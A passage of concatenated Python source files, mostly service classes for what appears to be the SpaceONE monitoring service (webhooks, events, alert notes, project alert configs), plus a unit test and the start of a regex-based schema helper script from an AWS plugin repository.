raise ERROR_WRONG_PLUGIN_SETTINGS(key='capability.monitoring_type')
if 'supported_schema' not in capability:
raise ERROR_WRONG_PLUGIN_SETTINGS(key='capability.supported_schema')
@staticmethod
def _check_plugin_info(plugin_info_params):
if 'plugin_id' not in plugin_info_params:
raise ERROR_REQUIRED_PARAMETER(key='plugin_info.plugin_id')
if plugin_info_params.get('upgrade_mode', 'AUTO') == 'MANUAL' and 'version' not in plugin_info_params:
raise ERROR_REQUIRED_PARAMETER(key='plugin_info.version')
secret_id = plugin_info_params.get('secret_id')
provider = plugin_info_params.get('provider')
if secret_id is None and provider is None:
raise ERROR_REQUIRED_PARAMETER(key='plugin_info.[secret_id | provider]')
def _get_plugin(self, plugin_info, domain_id):
plugin_id = plugin_info['plugin_id']
repo_mgr: RepositoryManager = self.locator.get_manager('RepositoryManager')
return repo_mgr.get_plugin(plugin_id, domain_id)
def _init_plugin(self, endpoint, options, monitoring_type):
self.ds_plugin_mgr.initialize(endpoint)
return self.ds_plugin_mgr.init_plugin(options, monitoring_type)
def _verify_plugin(self, endpoint, plugin_info, capability, domain_id):
plugin_id = plugin_info['plugin_id']
options = plugin_info.get('options', {})
secret_id = plugin_info.get('secret_id')
provider = plugin_info.get('provider')
secret_mgr: SecretManager = self.locator.get_manager('SecretManager')
secret_data, schema = secret_mgr.get_plugin_secret(plugin_id, secret_id, provider, capability, domain_id)
ds_plugin_mgr: DataSourcePluginManager = self.locator.get_manager('DataSourcePluginManager')
ds_plugin_mgr.initialize(endpoint)
ds_plugin_mgr.verify_plugin(options, secret_data, schema)
@cache.cacheable(key='init-data-source:{domain_id}', expire=300)
def _initialize_data_sources(self, domain_id):
_LOGGER.debug(f'[_initialize_data_source] domain_id: {domain_id}')
query = {'filter': [{'k': 'domain_id', 'v': domain_id, 'o': 'eq'}]}
data_source_vos, total_count = self.data_source_mgr.list_data_sources(query)
installed_data_sources_ids = [data_source_vo.plugin_info.plugin_id for data_source_vo in data_source_vos]
_LOGGER.debug(f'[_initialize_data_source] Installed Plugins : {installed_data_sources_ids}')
global_conf = config.get_global()
for _data_source in global_conf.get('INSTALLED_DATA_SOURCE_PLUGINS', []):
if _data_source['plugin_info']['plugin_id'] not in installed_data_sources_ids:
try:
_LOGGER.debug(
f'[_initialize_data_source] Create init data source: {_data_source["plugin_info"]["plugin_id"]}')
_data_source['domain_id'] = domain_id
self.register(_data_source)
except Exception as e:
_LOGGER.error(f'[_initialize_data_source] {e}')
return True
```
#### File: monitoring/service/event_service.py
```python
import logging
import copy
from spaceone.core.service import *
from spaceone.core import utils, cache, config
from spaceone.monitoring.error.webhook import *
from spaceone.monitoring.model.event_model import Event
from spaceone.monitoring.model.alert_model import Alert
from spaceone.monitoring.model.webhook_model import Webhook
from spaceone.monitoring.model.project_alert_config_model import ProjectAlertConfig
from spaceone.monitoring.model.escalation_policy_model import EscalationPolicy
from spaceone.monitoring.manager.alert_manager import AlertManager
from spaceone.monitoring.manager.webhook_manager import WebhookManager
from spaceone.monitoring.manager.event_manager import EventManager
from spaceone.monitoring.manager.event_rule_manager import EventRuleManager
from spaceone.monitoring.manager.job_manager import JobManager
from spaceone.monitoring.manager.webhook_plugin_manager import WebhookPluginManager
from spaceone.monitoring.manager.project_alert_config_manager import ProjectAlertConfigManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler(exclude=['create'])
@authorization_handler(exclude=['create'])
@mutation_handler
@event_handler
class EventService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.event_mgr: EventManager = self.locator.get_manager('EventManager')
self.webhook_mgr: WebhookManager = self.locator.get_manager('WebhookManager')
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'access_key', 'data'])
def create(self, params):
"""Create event
Args:
params (dict): {
'webhook_id': 'str',
'access_key': 'str',
'data': 'str'
}
Returns:
event_vo (object)
"""
webhook_data = self._get_webhook_data(params['webhook_id'])
self._check_access_key(params['access_key'], webhook_data['access_key'])
self._check_webhook_state(webhook_data)
try:
webhook_plugin_mgr: WebhookPluginManager = self.locator.get_manager('WebhookPluginManager')
endpoint, updated_version = webhook_plugin_mgr.get_webhook_plugin_endpoint({
'plugin_id': webhook_data['plugin_id'],
'version': webhook_data['plugin_version'],
'upgrade_mode': webhook_data['plugin_upgrade_mode']
}, webhook_data['domain_id'])
if updated_version:
_LOGGER.debug(f'[create] upgrade plugin version: {webhook_data["plugin_version"]} -> {updated_version}')
webhook_vo: Webhook = self.webhook_mgr.get_webhook(webhook_data['webhook_id'], webhook_data['domain_id'])
webhook_plugin_mgr.upgrade_webhook_plugin_version(webhook_vo, endpoint, updated_version)
cache.delete(f'webhook-data:{webhook_data["webhook_id"]}')
webhook_plugin_mgr.initialize(endpoint)
response = webhook_plugin_mgr.parse_event(webhook_data['plugin_options'], params['data'])
except Exception as e:
if not isinstance(e, ERROR_BASE):
e = ERROR_UNKNOWN(message=str(e))
_LOGGER.error(f'[create] Event parsing failed: {e.message}', exc_info=True)
response = self._create_error_event(webhook_data['name'], e.message)
for event_data in response.get('results', []):
# TODO: Check event data using schematics
_LOGGER.debug(f'[Event.create] event_data: {event_data}')
self._create_event(event_data, params['data'], webhook_data)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['event_id', 'domain_id'])
def get(self, params):
""" Get event
Args:
params (dict): {
'event_id': 'str',
'domain_id': 'str',
'only': 'list
}
Returns:
event_vo (object)
"""
return self.event_mgr.get_event(params['event_id'], params['domain_id'], params.get('only'))
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['domain_id'])
@append_query_filter(['event_id', 'event_key', 'event_type', 'severity', 'resource_id', 'alert_id',
'webhook_id', 'project_id', 'domain_id', 'user_projects'])
@append_keyword_filter(['event_id', 'title'])
def list(self, params):
""" List events
Args:
params (dict): {
'event_id': 'str',
'event_key': 'str',
'event_type': 'str',
'severity': 'str',
'resource_id': 'str',
'alert_id': 'str',
'webhook_id': 'str',
'project_id': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)',
'user_projects': 'list', // from meta
}
Returns:
event_vos (object)
total_count
"""
query = params.get('query', {})
return self.event_mgr.list_events(query)
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id', 'user_projects'])
@append_keyword_filter(['event_id', 'title'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)',
'user_projects': 'list', // from meta
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.event_mgr.stat_events(query)
@cache.cacheable(key='webhook-data:{webhook_id}', expire=300)
def _get_webhook_data(self, webhook_id):
webhook_vo: Webhook = self.webhook_mgr.get_webhook_by_id(webhook_id)
return {
'webhook_id': webhook_vo.webhook_id,
'name': webhook_vo.name,
'project_id': webhook_vo.project_id,
'domain_id': webhook_vo.domain_id,
'state': webhook_vo.state,
'access_key': webhook_vo.access_key,
'plugin_id': webhook_vo.plugin_info.plugin_id,
'plugin_version': webhook_vo.plugin_info.version,
'plugin_upgrade_mode': webhook_vo.plugin_info.upgrade_mode,
'plugin_options': webhook_vo.plugin_info.options
}
@staticmethod
def _check_access_key(request_access_key, webhook_access_key):
if request_access_key != webhook_access_key:
raise ERROR_PERMISSION_DENIED()
@staticmethod
def _check_webhook_state(webhook_data):
if webhook_data['state'] == 'DISABLED':
raise ERROR_WEBHOOK_STATE_DISABLED(webhook_id=webhook_data['webhook_id'])
def _create_event(self, event_data, raw_data, webhook_data):
event_data['raw_data'] = copy.deepcopy(raw_data)
event_data['occurred_at'] = utils.iso8601_to_datetime(event_data.get('occurred_at'))
event_data['webhook_id'] = webhook_data['webhook_id']
event_data['project_id'] = webhook_data['project_id']
event_data['domain_id'] = webhook_data['domain_id']
event_data['severity'] = event_data.get('severity', 'NONE')
event_rule_mgr: EventRuleManager = self.locator.get_manager('EventRuleManager')
# Change event data by event rule
event_data = event_rule_mgr.change_event_data(event_data, webhook_data['project_id'], webhook_data['domain_id'])
event_vo: Event = self.event_mgr.get_event_by_key(event_data['event_key'], event_data['domain_id'])
if event_vo and event_vo.alert.state != 'RESOLVED':
# Resolve alert when receiving recovery event
if event_data['event_type'] == 'RECOVERY':
self._update_alert_state(event_vo.alert)
event_data['alert_id'] = event_vo.alert_id
event_data['alert'] = event_vo.alert
else:
# Skip health event
if event_data['event_type'] == 'RECOVERY':
_LOGGER.debug(f'[_create_event] Skip health event: {event_data.get("title")} (event_type = RECOVERY)')
return None
# Create new alert
_LOGGER.debug(f'[_create_event] Create new alert: {event_data.get("title")} '
f'(event_type = {event_data["event_type"]})')
alert_vo = self._create_alert(event_data)
event_data['alert_id'] = alert_vo.alert_id
event_data['alert'] = alert_vo
self.event_mgr.create_event(event_data)
def _create_alert(self, event_data):
alert_mgr: AlertManager = self.locator.get_manager('AlertManager')
alert_data = copy.deepcopy(event_data)
if 'urgency' in event_data:
alert_data['urgency'] = event_data['urgency']
else:
alert_data['urgency'] = self._get_urgency_from_severity(event_data['severity'])
escalation_policy_id, escalation_ttl = self._get_escalation_policy_info(event_data['project_id'],
event_data['domain_id'])
alert_data['escalation_policy_id'] = escalation_policy_id
if event_data.get('no_notification', False):
alert_data['escalation_ttl'] = 0
else:
alert_data['escalation_ttl'] = escalation_ttl + 1
alert_data['triggered_by'] = alert_data['webhook_id']
if event_data.get('event_type', 'ERROR') == 'ERROR':
alert_data['state'] = 'ERROR'
alert_vo = alert_mgr.create_alert(alert_data)
self._create_notification(alert_vo, 'create_alert_notification')
return alert_vo
@staticmethod
def _get_urgency_from_severity(severity):
if severity in ['CRITICAL', 'ERROR', 'NOT_AVAILABLE']:
return 'HIGH'
else:
return 'LOW'
@cache.cacheable(key='escalation-policy-info:{domain_id}:{project_id}', expire=300)
def _get_escalation_policy_info(self, project_id, domain_id):
project_alert_config_vo: ProjectAlertConfig = self._get_project_alert_config(project_id, domain_id)
escalation_policy_vo: EscalationPolicy = project_alert_config_vo.escalation_policy
return escalation_policy_vo.escalation_policy_id, escalation_policy_vo.repeat_count
def _update_alert_state(self, alert_vo: Alert):
if self._is_auto_recovery(alert_vo.project_id, alert_vo.domain_id) and alert_vo.state != 'RESOLVED':
alert_mgr: AlertManager = self.locator.get_manager('AlertManager')
alert_mgr.update_alert_by_vo({'state': 'RESOLVED'}, alert_vo)
self._create_notification(alert_vo, 'create_resolved_notification')
@cache.cacheable(key='auto-recovery:{domain_id}:{project_id}', expire=300)
def _is_auto_recovery(self, project_id, domain_id):
project_alert_config_vo: ProjectAlertConfig = self._get_project_alert_config(project_id, domain_id)
return project_alert_config_vo.options.recovery_mode == 'AUTO'
def _get_project_alert_config(self, project_id, domain_id):
project_alert_config_mgr: ProjectAlertConfigManager = self.locator.get_manager('ProjectAlertConfigManager')
return project_alert_config_mgr.get_project_alert_config(project_id, domain_id)
def _create_notification(self, alert_vo: Alert, method):
# if alert_vo.state != 'ERROR':
self._set_transaction_token()
job_mgr: JobManager = self.locator.get_manager('JobManager')
job_mgr.push_task(
'monitoring_alert_notification_from_webhook',
'JobService',
method,
{
'alert_id': alert_vo.alert_id,
'domain_id': alert_vo.domain_id
}
)
def _set_transaction_token(self):
self.transaction.set_meta('token', config.get_global('TOKEN'))
self.transaction.service = 'monitoring'
self.transaction.resource = 'Event'
self.transaction.verb = 'create'
@staticmethod
def _create_error_event(webhook_name, error_message):
response = {
'results': [
{
'event_key': utils.generate_id('error'),
'event_type': 'ERROR',
'title': f'Webhook Event Parsing Error - {webhook_name}',
'description': error_message,
'severity': 'CRITICAL'
}
]
}
return response
```
#### File: monitoring/service/note_service.py
```python
import logging
from spaceone.core.service import *
from spaceone.monitoring.model.note_model import Note
from spaceone.monitoring.manager.alert_manager import AlertManager
from spaceone.monitoring.manager.note_manager import NoteManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
class NoteService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.note_mgr: NoteManager = self.locator.get_manager('NoteManager')
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['alert_id', 'note', 'domain_id'])
def create(self, params):
"""Create alert note
Args:
params (dict): {
'alert_id': 'str',
'note': 'str',
'domain_id': 'str'
}
Returns:
note_vo (object)
"""
user_id = self.transaction.get_meta('user_id')
alert_mgr: AlertManager = self.locator.get_manager('AlertManager')
alert_vo = alert_mgr.get_alert(params['alert_id'], params['domain_id'])
params['alert'] = alert_vo
params['project_id'] = alert_vo.project_id
params['created_by'] = user_id
return self.note_mgr.create_note(params)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['note_id', 'domain_id'])
def update(self, params):
"""Update alert note
Args:
params (dict): {
'note_id': 'str',
'note': 'dict',
'domain_id': 'str'
}
Returns:
note_vo (object)
"""
note_id = params['note_id']
domain_id = params['domain_id']
note_vo = self.note_mgr.get_note(note_id, domain_id)
# Check permission
return self.note_mgr.update_note_by_vo(params, note_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['note_id', 'domain_id'])
def delete(self, params):
"""Delete alert note
Args:
params (dict): {
'note_id': 'str',
'domain_id': 'str'
}
Returns:
None
"""
self.note_mgr.delete_note(params['note_id'], params['domain_id'])
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['note_id', 'domain_id'])
def get(self, params):
""" Get alert note
Args:
params (dict): {
'note_id': 'str',
'domain_id': 'str',
'only': 'list
}
Returns:
note_vo (object)
"""
return self.note_mgr.get_note(params['note_id'], params['domain_id'], params.get('only'))
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['domain_id'])
@append_query_filter(['note_id', 'alert_id', 'created_by', 'project_id', 'domain_id', 'user_projects'])
@append_keyword_filter(['note_id', 'note'])
def list(self, params):
""" List alert notes
Args:
params (dict): {
'note_id': 'str',
'alert_id': 'str',
'created_by': 'str',
'project_id': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)',
'user_projects': 'list', // from meta
}
Returns:
note_vos (object)
total_count
"""
query = params.get('query', {})
return self.note_mgr.list_notes(query)
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id', 'user_projects'])
@append_keyword_filter(['note_id', 'note'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)',
'user_projects': 'list', // from meta
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.note_mgr.stat_notes(query)
```
#### File: monitoring/service/project_alert_config_service.py
```python
import logging
from spaceone.core.service import *
from spaceone.monitoring.error import *
from spaceone.monitoring.model.project_alert_config_model import ProjectAlertConfig
from spaceone.monitoring.manager.identity_manager import IdentityManager
from spaceone.monitoring.manager.escalation_policy_manager import EscalationPolicyManager
from spaceone.monitoring.manager.project_alert_config_manager import ProjectAlertConfigManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
class ProjectAlertConfigService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.project_alert_config_mgr: ProjectAlertConfigManager = self.locator.get_manager('ProjectAlertConfigManager')
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['project_id', 'domain_id'])
def create(self, params):
"""Create project alert configuration
Args:
params (dict): {
'project_id': 'str',
'escalation_policy_id': 'str',
'options': 'dict',
'domain_id': 'str'
}
Returns:
project_alert_config_vo (object)
"""
project_id = params['project_id']
escalation_policy_id = params.get('escalation_policy_id')
domain_id = params['domain_id']
identity_mgr: IdentityManager = self.locator.get_manager('IdentityManager')
escalation_policy_mgr: EscalationPolicyManager = self.locator.get_manager('EscalationPolicyManager')
identity_mgr.get_project(project_id, domain_id)
if escalation_policy_id:
escalation_policy_vo = escalation_policy_mgr.get_escalation_policy(escalation_policy_id, domain_id)
if escalation_policy_vo.scope == 'PROJECT' and escalation_policy_vo.project_id != project_id:
raise ERROR_INVALID_ESCALATION_POLICY(escalation_policy_id=escalation_policy_id)
params['escalation_policy'] = escalation_policy_vo
else:
escalation_policy_vo = escalation_policy_mgr.get_default_escalation_policy(domain_id)
params['escalation_policy_id'] = escalation_policy_vo.escalation_policy_id
params['escalation_policy'] = escalation_policy_vo
return self.project_alert_config_mgr.create_project_alert_config(params)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['project_id', 'domain_id'])
def update(self, params):
"""Update project alert configuration
Args:
params (dict): {
'project_id': 'str',
'escalation_policy_id': 'dict',
'options': 'dict',
'domain_id': 'str'
}
Returns:
project_alert_config_vo (object)
"""
project_id = params['project_id']
escalation_policy_id = params.get('escalation_policy_id')
domain_id = params['domain_id']
project_alert_config_vo: ProjectAlertConfig = self.project_alert_config_mgr.get_project_alert_config(project_id,
domain_id)
if escalation_policy_id:
escalation_policy_mgr: EscalationPolicyManager = self.locator.get_manager('EscalationPolicyManager')
escalation_policy_vo = escalation_policy_mgr.get_escalation_policy(escalation_policy_id, domain_id)
if escalation_policy_vo.scope == 'PROJECT' and escalation_policy_vo.project_id != project_id:
raise ERROR_INVALID_ESCALATION_POLICY(escalation_policy_id=escalation_policy_id)
params['escalation_policy'] = escalation_policy_vo
if 'options' in params:
if 'recovery_mode' not in params['options']:
params['options']['recovery_mode'] = project_alert_config_vo.options.recovery_mode
if 'notification_urgency' not in params['options']:
params['options']['notification_urgency'] = project_alert_config_vo.options.notification_urgency
return self.project_alert_config_mgr.update_project_alert_config_by_vo(params, project_alert_config_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['project_id', 'domain_id'])
def delete(self, params):
"""Delete project alert configuration
Args:
params (dict): {
'project_id': 'str',
'domain_id': 'str'
}
Returns:
None
"""
self.project_alert_config_mgr.delete_project_alert_config(params['project_id'], params['domain_id'])
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['project_id', 'domain_id'])
@change_only_key({'escalation_policy_info': 'escalation_policy'})
def get(self, params):
""" Get project alert configuration
Args:
params (dict): {
'project_id': 'str',
'domain_id': 'str',
'only': 'list
}
Returns:
project_alert_config_vo (object)
"""
return self.project_alert_config_mgr.get_project_alert_config(params['project_id'], params['domain_id'], params.get('only'))
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['domain_id'])
@change_only_key({'escalation_policy_info': 'escalation_policy'}, key_path='query.only')
@append_query_filter(['project_id', 'escalation_policy_id', 'domain_id', 'user_projects'])
@append_keyword_filter(['project_id'])
def list(self, params):
""" List project alert configurations
Args:
params (dict): {
'project_id': 'str',
'escalation_policy_id': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)',
'user_projects': 'list', // from meta
}
Returns:
project_alert_config_vos (object)
total_count
"""
query = params.get('query', {})
return self.project_alert_config_mgr.list_project_alert_configs(query)
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id', 'user_projects'])
@append_keyword_filter(['project_id'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)',
'user_projects': 'list', // from meta
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.project_alert_config_mgr.stat_project_alert_configs(query)
```
#### File: monitoring/service/webhook_service.py
```python
import logging
from spaceone.core.service import *
from spaceone.core import utils
from spaceone.monitoring.error import *
from spaceone.monitoring.model.webhook_model import Webhook
from spaceone.monitoring.manager.project_alert_config_manager import ProjectAlertConfigManager
from spaceone.monitoring.manager.repository_manager import RepositoryManager
from spaceone.monitoring.manager.webhook_plugin_manager import WebhookPluginManager
from spaceone.monitoring.manager.webhook_manager import WebhookManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
class WebhookService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.webhook_mgr: WebhookManager = self.locator.get_manager('WebhookManager')
self.webhook_plugin_mgr: WebhookPluginManager = self.locator.get_manager('WebhookPluginManager')
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['name', 'plugin_info', 'project_id', 'domain_id'])
def create(self, params):
"""Create webhook
Args:
params (dict): {
'name': 'str',
'plugin_info': 'dict',
'project_id': 'str'
'tags': 'dict',
'domain_id': 'str'
}
Returns:
webhook_vo (object)
"""
domain_id = params['domain_id']
project_id = params['project_id']
project_alert_config_mgr: ProjectAlertConfigManager = self.locator.get_manager('ProjectAlertConfigManager')
project_alert_config_mgr.get_project_alert_config(project_id, domain_id)
self._check_plugin_info(params['plugin_info'])
plugin_info = self._get_plugin(params['plugin_info'], domain_id)
params['capability'] = plugin_info.get('capability', {})
_LOGGER.debug(f'[create] Init Plugin: {params["plugin_info"]}')
endpoint, updated_version = self.webhook_plugin_mgr.get_webhook_plugin_endpoint(params['plugin_info'], domain_id)
if updated_version:
params['plugin_info']['version'] = updated_version
options = params['plugin_info'].get('options', {})
plugin_metadata = self._init_plugin(endpoint, options)
params['plugin_info']['metadata'] = plugin_metadata
webhook_vo: Webhook = self.webhook_mgr.create_webhook(params)
access_key = self._generate_access_key()
webhook_url = self._make_webhook_url(webhook_vo.webhook_id, access_key)
return self.webhook_mgr.update_webhook_by_vo({
'access_key': access_key,
'webhook_url': webhook_url
}, webhook_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def update(self, params):
"""Update webhook
Args:
params (dict): {
'webhook_id': 'str',
'name': 'dict',
'tags': 'dict'
'domain_id': 'str'
}
Returns:
webhook_vo (object)
"""
webhook_id = params['webhook_id']
domain_id = params['domain_id']
webhook_vo = self.webhook_mgr.get_webhook(webhook_id, domain_id)
return self.webhook_mgr.update_webhook_by_vo(params, webhook_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def enable(self, params):
""" Enable webhook
Args:
params (dict): {
'webhook_id': 'str',
'domain_id': 'str'
}
Returns:
webhook_vo (object)
"""
webhook_id = params['webhook_id']
domain_id = params['domain_id']
webhook_vo = self.webhook_mgr.get_webhook(webhook_id, domain_id)
return self.webhook_mgr.update_webhook_by_vo({'state': 'ENABLED'}, webhook_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def disable(self, params):
""" Disable webhook
Args:
params (dict): {
'webhook_id': 'str',
'domain_id': 'str'
}
Returns:
webhook_vo (object)
"""
webhook_id = params['webhook_id']
domain_id = params['domain_id']
webhook_vo = self.webhook_mgr.get_webhook(webhook_id, domain_id)
return self.webhook_mgr.update_webhook_by_vo({'state': 'DISABLED'}, webhook_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def delete(self, params):
"""Delete webhook
Args:
params (dict): {
'webhook_id': 'str',
'domain_id': 'str'
}
Returns:
None
"""
self.webhook_mgr.delete_webhook(params['webhook_id'], params['domain_id'])
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def verify_plugin(self, params):
""" Verify webhook plugin
Args:
params (dict): {
'webhook_id': 'str',
'domain_id': 'str'
}
Returns:
webhook_vo (object)
"""
webhook_id = params['webhook_id']
domain_id = params['domain_id']
webhook_vo = self.webhook_mgr.get_webhook(webhook_id, domain_id)
endpoint = self.webhook_plugin_mgr.get_webhook_plugin_endpoint_by_vo(webhook_vo)
self._verify_plugin(endpoint, webhook_vo.plugin_info.options)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def update_plugin(self, params):
"""Update webhook plugin
Args:
params (dict): {
'webhook_id': 'str',
'version': 'str',
'options': 'dict',
'upgrade_mode': 'str',
'domain_id': 'str'
}
Returns:
webhook_vo (object)
"""
webhook_id = params['webhook_id']
domain_id = params['domain_id']
options = params.get('options')
version = params.get('version')
upgrade_mode = params.get('upgrade_mode')
webhook_vo = self.webhook_mgr.get_webhook(webhook_id, domain_id)
plugin_info = webhook_vo.plugin_info.to_dict()
if version:
plugin_info['version'] = version
if options:
plugin_info['options'] = options
if upgrade_mode:
plugin_info['upgrade_mode'] = upgrade_mode
endpoint, updated_version = self.webhook_plugin_mgr.get_webhook_plugin_endpoint(plugin_info, domain_id)
if updated_version:
plugin_info['version'] = updated_version
plugin_metadata = self._init_plugin(endpoint, plugin_info.get('options', {}))
plugin_info['metadata'] = plugin_metadata
params = {
'plugin_info': plugin_info
}
_LOGGER.debug(f'[update_plugin] {plugin_info}')
return self.webhook_mgr.update_webhook_by_vo(params, webhook_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def get(self, params):
""" Get webhook
Args:
params (dict): {
'webhook_id': 'str',
'domain_id': 'str',
'only': 'list
}
Returns:
webhook_vo (object)
"""
return self.webhook_mgr.get_webhook(params['webhook_id'], params['domain_id'], params.get('only'))
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['domain_id'])
@append_query_filter(['webhook_id', 'name', 'state', 'access_key', 'project_id', 'domain_id', 'user_projects'])
@append_keyword_filter(['webhook_id', 'name'])
def list(self, params):
""" List webhooks
Args:
params (dict): {
'webhook_id': 'str',
'name': 'str',
'state': 'str',
'project_id': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)',
'user_projects': 'list', // from meta
}
Returns:
webhook_vos (object)
total_count
"""
query = params.get('query', {})
return self.webhook_mgr.list_webhooks(query)
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id', 'user_projects'])
@append_keyword_filter(['webhook_id', 'name'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)',
'user_projects': 'list', // from meta
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.webhook_mgr.stat_webhooks(query)
@staticmethod
def _generate_access_key():
return utils.random_string(16)
@staticmethod
def _make_webhook_url(webhook_id, access_key):
return f'/monitoring/v1/webhook/{webhook_id}/{access_key}/events'
@staticmethod
def _check_plugin_info(plugin_info_params):
if 'plugin_id' not in plugin_info_params:
raise ERROR_REQUIRED_PARAMETER(key='plugin_info.plugin_id')
def _get_plugin(self, plugin_info, domain_id):
plugin_id = plugin_info['plugin_id']
repo_mgr: RepositoryManager = self.locator.get_manager('RepositoryManager')
plugin_info = repo_mgr.get_plugin(plugin_id, domain_id)
return plugin_info
def _init_plugin(self, endpoint, options):
self.webhook_plugin_mgr.initialize(endpoint)
return self.webhook_plugin_mgr.init_plugin(options)
def _verify_plugin(self, endpoint, options):
self.webhook_plugin_mgr.initialize(endpoint)
self.webhook_plugin_mgr.verify_plugin(options)
```
#### File: test/api/test_log_api.py
```python
import unittest
from unittest.mock import patch
from mongoengine import connect, disconnect
from google.protobuf.json_format import MessageToDict
from google.protobuf.empty_pb2 import Empty
from spaceone.core.unittest.result import print_message
from spaceone.core.unittest.runner import RichTestRunner
from spaceone.core import config
from spaceone.core import utils
from spaceone.core.service import BaseService
from spaceone.core.locator import Locator
from spaceone.core.pygrpc import BaseAPI
from spaceone.api.monitoring.v1 import log_pb2
from spaceone.monitoring.interface.grpc.v1.log import Log
from test.factory.log_factory import LogDataFactory
class _MockLogService(BaseService):
def list(self, params):
return LogDataFactory()
class TestLogAPI(unittest.TestCase):
@classmethod
def setUpClass(cls):
config.init_conf(package='spaceone.monitoring')
connect('test', host='mongomock://localhost')
super().setUpClass()
@classmethod
def tearDownClass(cls) -> None:
super().tearDownClass()
disconnect()
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockLogService())
@patch.object(BaseAPI, 'parse_request')
def test_list_logs(self, mock_parse_request, *args):
print(LogDataFactory())
mock_parse_request.return_value = ({}, {})
log_servicer = Log()
logs_info = log_servicer.list({}, {})
print_message(logs_info, 'test_list_logs')
if __name__ == "__main__":
unittest.main(testRunner=RichTestRunner)
```
|
{
"source": "jean1042/plugin-aws-cloud-services",
"score": 3
}
|
#### File: plugin-aws-cloud-services/bin/srt.py
```python
import re
from dataclasses import dataclass
from functools import partial
from typing import List
def make_snake_name(str):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', str)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def make_simple_type(type_name, match):
field = match.group(1)
snake_field = make_snake_name(field)
return f"""\n'{field}':'{snake_field} = {type_name}(deserialize_from="{field}")'"""
def make_choice_string_type(match):
field = match.group(1)
snake_field = make_snake_name(field)
raw_choices = match.group(2).split('|')
chocies = ",".join([c.replace("'", '"') for c in raw_choices])
return f"""\n'{field}':'{snake_field} = StringType(deserialize_from="{field}",choices=[{chocies}])'"""
prefix_re = "\s*'(\w+)'\s?:\s?"
boolean_re = re.compile(f"{prefix_re}True\s?\|\s?False")
int_re = re.compile(f"{prefix_re}123")
float_re = re.compile(f"{prefix_re}123.0")
datetime_re = re.compile(f"{prefix_re}datetime\(.*\)")
